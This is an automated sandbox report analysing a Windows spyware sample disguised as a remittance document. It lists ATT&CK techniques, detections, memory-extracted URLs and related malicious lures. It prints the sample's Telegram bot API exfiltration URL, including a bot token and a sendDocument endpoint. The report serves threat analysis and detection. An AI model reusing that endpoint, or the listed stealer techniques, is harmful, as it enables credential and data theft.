                      Source: Yara matchFile source: 00000005.00000000.679774428.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.678447633.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.678850422.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.679389493.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.923014189.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.682657468.00000000039E9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.924472986.00000000031A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: remmittance copy.exe PID: 6336, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: remmittance copy.exe PID: 3864, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Path InterceptionProcess Injection112Masquerading1OS Credential Dumping2Query Registry1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumWeb Service1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1Credentials in Registry1Security Software Discovery211Remote Desktop ProtocolArchive Collected Data11Exfiltration Over BluetoothEncrypted Channel11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion141Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Local System2Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection112NTDSVirtualization/Sandbox Evasion141Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information2Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncSystem Information Discovery114Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      No Antivirus matches

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      5.0.remmittance copy.exe.400000.10.unpack100%AviraTR/Spy.Gen8Download File
                      5.0.remmittance copy.exe.400000.6.unpack100%AviraTR/Spy.Gen8Download File
                      5.0.remmittance copy.exe.400000.8.unpack100%AviraTR/Spy.Gen8Download File
                      5.2.remmittance copy.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      5.0.remmittance copy.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                      5.0.remmittance copy.exe.400000.12.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://NoCGvF.com0%Avira URL Cloudsafe
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://www.fontbureau.commna0%Avira URL Cloudsafe
                      http://www.fontbureau.comcomm0%Avira URL Cloudsafe
                      https://qEv5A6okmkiAozFZ9P4.org0%Avira URL Cloudsafe
                      http://www.tiro.com0%URL Reputationsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://www.fontbureau.coma0%URL Reputationsafe
                      http://www.collada.org/2005/11/COLLADASchema9Done0%URL Reputationsafe
                      http://www.carterandcone.coml0%URL Reputationsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://fontfabrik.com0%URL Reputationsafe
                      http://www.founder.com.cn/cn0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
                      https://api.telegram.org4.l0%Avira URL Cloudsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      http://www.sakkal.com0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      api.telegram.org
                      		149.154.167.220
                      		truefalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://api.telegram.org/bot1975237880:AAHKgRnseXCSSPJw6MgfujMF0PvBjyMOsXc/sendDocumentfalse
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://NoCGvF.comremmittance copy.exe, 00000005.00000002.924472986.00000000031A1000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://127.0.0.1:HTTP/1.1remmittance copy.exe, 00000005.00000002.924472986.00000000031A1000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		low
                          http://www.apache.org/licenses/LICENSE-2.0remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpfalse
                            		high
                            http://www.fontbureau.comremmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpfalse
                              		high
                              http://www.fontbureau.com/designersGremmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpfalse
                                		high
                                https://api.telegram.org/bot1975237880:AAHKgRnseXCSSPJw6MgfujMF0PvBjyMOsXc/sendDocumentdocument-----remmittance copy.exe, 00000005.00000002.924472986.00000000031A1000.00000004.00000001.sdmpfalse
                                  		high
                                  http://DynDns.comDynDNSremmittance copy.exe, 00000005.00000002.924472986.00000000031A1000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers/?remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.founder.com.cn/cn/bTheremmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://api.telegram.orgremmittance copy.exe, 00000005.00000002.925065782.00000000034FC000.00000004.00000001.sdmpfalse
                                      		high
                                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haremmittance copy.exe, 00000005.00000002.924472986.00000000031A1000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers?remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.fontbureau.commnaremmittance copy.exe, 00000000.00000002.682014118.0000000000DE0000.00000004.00000040.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.fontbureau.comcommremmittance copy.exe, 00000000.00000002.682014118.0000000000DE0000.00000004.00000040.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://qEv5A6okmkiAozFZ9P4.orgremmittance copy.exe, 00000005.00000002.924472986.00000000031A1000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.tiro.comremmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://api.telegram.org/bot1975237880:AAHKgRnseXCSSPJw6MgfujMF0PvBjyMOsXc/remmittance copy.exe, 00000000.00000002.682657468.00000000039E9000.00000004.00000001.sdmp, remmittance copy.exe, 00000005.00000000.679774428.0000000000402000.00000040.00000001.sdmpfalse
                                          		high
                                          http://www.fontbureau.com/designersremmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.goodfont.co.krremmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.comaremmittance copy.exe, 00000000.00000002.682014118.0000000000DE0000.00000004.00000040.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.collada.org/2005/11/COLLADASchema9Doneremmittance copy.exe, 00000000.00000002.682352085.00000000029E1000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.carterandcone.comlremmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.sajatypeworks.comremmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.typography.netDremmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers/cabarga.htmlNremmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.founder.com.cn/cn/cTheremmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.galapagosdesign.com/staff/dennis.htmremmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://fontfabrik.comremmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.founder.com.cn/cnremmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers/frere-user.htmlremmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpfalse
                                                		high
                                                http://www.jiyu-kobo.co.jp/remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.galapagosdesign.com/DPleaseremmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.com/designers8remmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.fonts.comremmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://www.sandoll.co.krremmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://api.telegram.org4.lremmittance copy.exe, 00000005.00000002.925065782.00000000034FC000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.urwpp.deDPleaseremmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.zhongyicts.com.cnremmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://api.telegram.orgremmittance copy.exe, 00000005.00000002.925105112.0000000003512000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameremmittance copy.exe, 00000005.00000002.925065782.00000000034FC000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://www.sakkal.comremmittance copy.exe, 00000000.00000002.683834189.0000000006B72000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipremmittance copy.exe, 00000000.00000002.682657468.00000000039E9000.00000004.00000001.sdmp, remmittance copy.exe, 00000005.00000000.679774428.0000000000402000.00000040.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown

                                                        Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        149.154.167.220
                                                        		api.telegram.orgUnited Kingdom
                                                        		62041TELEGRAMRUfalse

                                                        General Information

                                                        Joe Sandbox Version:33.0.0 White Diamond
                                                        Analysis ID:510735
                                                        Start date:28.10.2021
                                                        Start time:07:38:13
                                                        Joe Sandbox Product:CloudBasic
                                                        Overall analysis duration:0h 9m 24s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:light
                                                        Sample file name:remmittance copy.exe
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                        Number of analysed new started processes analysed:17
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • HDC enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@5/1@1/1
                                                        EGA Information:Failed
                                                        HDC Information:Failed
                                                        HCA Information:
                                                        • Successful, ratio: 97%
                                                        • Number of executed functions: 0
                                                        • Number of non-executed functions: 0
                                                        Cookbook Comments:
                                                        • Adjust boot time
                                                        • Enable AMSI
                                                        • Found application associated with file extension: .exe
                                                        Warnings:
                                                        Show All
                                                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                        • Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.50.102.62, 173.222.108.210, 173.222.108.226, 20.54.110.249, 40.91.112.76, 40.112.88.60, 52.251.79.25, 80.67.82.211, 80.67.82.235, 20.82.210.154
                                                        • Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        07:39:15API Interceptor727x Sleep call for process: remmittance copy.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        149.154.167.220DHL_Shipment_Notification.exeGet hashmaliciousBrowse
                                                          RFQ TESDA PROJECT.exeGet hashmaliciousBrowse
                                                            DHL_waybill20212810.exeGet hashmaliciousBrowse
                                                              PR-007493 PR-007495.exeGet hashmaliciousBrowse
                                                                hSNPFOpBGX.exeGet hashmaliciousBrowse
                                                                  PR-007493 PR-007495.exeGet hashmaliciousBrowse
                                                                    N9FpyeJiD6.exeGet hashmaliciousBrowse
                                                                      tEodoA3rYx.exeGet hashmaliciousBrowse
                                                                        Documents Of Shipping.exeGet hashmaliciousBrowse
                                                                          Request for quotation.exeGet hashmaliciousBrowse
                                                                            Dhl Parcel.exeGet hashmaliciousBrowse
                                                                              Purchase Order.exeGet hashmaliciousBrowse
                                                                                Proforma invoice INV2.pdf.exeGet hashmaliciousBrowse
                                                                                  PROFORMA COPY.exeGet hashmaliciousBrowse
                                                                                    Urgent Order.exeGet hashmaliciousBrowse
                                                                                      Proforma invoice INV8.pdf.exeGet hashmaliciousBrowse
                                                                                        Proforma invoice INV15.pdf.exeGet hashmaliciousBrowse
                                                                                          invoice.exeGet hashmaliciousBrowse
                                                                                            PbPJG6PBnmrxM35.exeGet hashmaliciousBrowse
                                                                                              QVJHJ4CTW3iTs71.exeGet hashmaliciousBrowse

                                                                                                Domains

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                api.telegram.orgDHL_Shipment_Notification.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                RFQ TESDA PROJECT.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                DHL Shipping Documents REF - WAYBILL 44 7611 9546.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                DHL_waybill20212810.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                PR-007493 PR-007495.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                LB37AEeWAz.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                hSNPFOpBGX.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                DpJvbZvtGs.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                RFI5d7WHzQ.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                PR-007493 PR-007495.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                LauncherHack.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                N9FpyeJiD6.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                tEodoA3rYx.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                Documents Of Shipping.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                Request for quotation.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                Dhl Parcel.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                Purchase Order.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                Proforma invoice INV2.pdf.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                PROFORMA COPY.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                Urgent Order.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220

                                                                                                ASN

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                TELEGRAMRUDHL_Shipment_Notification.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                RFQ TESDA PROJECT.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                DHL_waybill20212810.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                PR-007493 PR-007495.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                DDEEBC8CCCC58E25CE1709B0E9A519B2BD46472E92860.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.99
                                                                                                http___backupsoldyn.duckdns.org_11d_solex.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.99
                                                                                                http___backupsoldyn.duckdns.org_11d_solex.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.99
                                                                                                op9GwJXEM8.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.99
                                                                                                op9GwJXEM8.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.99
                                                                                                hSNPFOpBGX.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                RifGjmcXrZ.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.99
                                                                                                dCDK0fokGD.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.99
                                                                                                UYnxVWnBmO.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.99
                                                                                                RifGjmcXrZ.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.99
                                                                                                dCDK0fokGD.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.99
                                                                                                UYnxVWnBmO.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.99
                                                                                                PR-007493 PR-007495.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                N9FpyeJiD6.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                0IuRlVUH6L.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.99
                                                                                                CMkPFGn9Ur.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.99

                                                                                                JA3 Fingerprints

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                3b5074b1b5d032e5620f69f9f700ff0ecalc.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                calc.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                j1XcBWNHwh.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                DHL_Shipment_Notification.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                mxZECDzIFz.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                RFQ TESDA PROJECT.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                IB5eMmKwbD.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                DHL_waybill20212810.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                r18qGHf6vL.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                PR-007493 PR-007495.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                Software updated by Dylox.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                open this if the doesn't work.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                hSNPFOpBGX.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                XoPspkwdql.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                jamDpbFXfr.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                SOkQ2u6sxV.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                PR-007493 PR-007495.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                INVOICE 003.pdf.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                Genshin Hack v2.0.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220
                                                                                                Fortnite Hack Mod v1.4.exeGet hashmaliciousBrowse
                                                                                                • 149.154.167.220

                                                                                                Dropped Files

                                                                                                No context

                                                                                                Created / dropped Files

                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\remmittance copy.exe.log
                                                                                                Process:C:\Users\user\Desktop\remmittance copy.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):1216
                                                                                                Entropy (8bit):5.355304211458859
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                                                MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                                                                SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                                                                SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                                                                SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                                                Malicious:false
                                                                                                Reputation:high, very likely benign file
                                                                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                                                                Static File Info

                                                                                                General

                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Entropy (8bit):7.785452544359051
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                File name:remmittance copy.exe
                                                                                                File size:422912
                                                                                                MD5:c039d3d94f0cc82369c066e26a67e0f6
                                                                                                SHA1:79519d3cbee4d7af49cf1572ed9a5fa87b2186fe
                                                                                                SHA256:219816561a364b4e85a344de1a4d7c7f74a01068f9a51bbb7e3101c9c9dd05ac
                                                                                                SHA512:96cb04fd36b5fa9bdfbdc1c37b04595333e96bdd55f50f21623c9418c46a7000d93afbe0ee40ab71f4813df515cf6fd6ec22f4b6216a124ac1af5be769bf55f1
                                                                                                SSDEEP:12288:kdQ8VS/EtO86ljk/nqS48szz1sUTT5Knwv:F/SLPc8s/CUTo
                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ya..............0..d...........Q... ........@.. ....................................@................................

                                                                                                File Icon

                                                                                                Icon Hash:070717131b3d0636

                                                                                                Static PE Info

                                                                                                General

                                                                                                Entrypoint:0x4651e6
                                                                                                Entrypoint Section:.text
                                                                                                Digitally signed:false
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                Time Stamp:0x6179F1C8 [Thu Oct 28 00:41:44 2021 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:v4.0.30319
                                                                                                OS Version Major:4
                                                                                                OS Version Minor:0
                                                                                                File Version Major:4
                                                                                                File Version Minor:0
                                                                                                Subsystem Version Major:4
